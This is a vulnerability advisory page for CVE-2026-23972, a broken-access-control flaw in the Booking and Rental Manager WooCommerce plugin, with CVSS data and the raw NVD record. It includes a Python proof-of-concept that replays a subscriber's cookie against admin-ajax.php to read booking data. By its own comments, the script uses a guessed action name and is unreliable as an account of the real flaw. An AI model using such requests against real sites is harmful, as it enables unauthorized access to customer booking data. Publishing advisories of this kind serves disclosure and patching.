Security Vulnerability Report
中文
CVE-2026-23972 CVSS 6.5 MEDIUM

CVE-2026-23972

Published: 2026-03-25 17:16:36
Last Modified: 2026-04-28 16:16:08

Description

Missing Authorization vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking and Rental Manager: from n/a through <= 2.6.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Booking and Rental Manager for WooCommerce <= 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-23972: Missing Authorization in Booking and Rental Manager import requests # Configuration target_url = "http://example.com" # Replace with target URL attacker_cookie = "wordpress_logged_in_xxx..." # Cookie for low-privileged user (Subscriber) # The vulnerable endpoint is typically an AJAX action or REST route # Specific action name requires reverse engineering the plugin ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload simulating an unauthorized request payload = { "action": "brm_get_booking_details", # Hypothetical action name "booking_id": "1", # Target ID to retrieve sensitive info "security": "nonexistent" # May try to bypass nonce checks } headers = { "Cookie": attacker_cookie, "User-Agent": "CVE-2026-23972-Scanner", "Accept": "application/json" } try: print(f"[+] Sending request to {ajax_url}...") response = requests.post(ajax_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Request successful!") print("[+] Response data:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23972", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:36.280", "lastModified": "2026-04-28T16:16:07.700", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking and Rental Manager: from n/a through <= 2.6.0."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en magepeopleteam Booking and Rental Manager booking-and-rental-manager-for-woocommerce permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Booking and Rental Manager: desde n/a hasta &lt;= 2.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/booking-and-rental-manager-for-woocommerce/vulnerability/wordpress-booking-and-rental-manager-plugin-2-6-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}